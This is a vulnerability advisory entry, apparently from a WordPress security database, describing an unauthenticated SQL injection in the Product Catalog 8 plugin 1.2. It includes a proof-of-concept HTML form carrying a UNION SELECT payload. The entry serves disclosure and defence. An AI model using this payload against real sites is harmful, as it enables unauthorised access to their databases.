Product Catalog 8 1.2 - Unauthenticated SQL Injection



Description
$_POST[ ‘selectedCategory’ ] is not escaped. UpdateCategoryList() is accessible for any user.
Proof of Concept
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php">
<input type="text" name="selectedCategory" value="0 UNION SELECT 1,2,3,4,5,6 FROM wp_terms WHERE term_id=1">
<input type="text" name="action" value="UpdateCategoryList">
<input type="submit" value="Send">
</form>

Affects Plugin

References

EXPLOITDB 40783
URL http://lenonleite.com.br/en/blog/2016/11/18/product-catalog-8-plugin-wordpress-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br
Submitter Twitter lenonleite
Views 4897
Verified No
WPVDB ID 8686

Timeline

Publicly Published 2016-11-28 (almost 3 years ago)
Added 2016-12-06 (almost 3 years ago)
Last Updated 2016-12-06 (almost 3 years ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin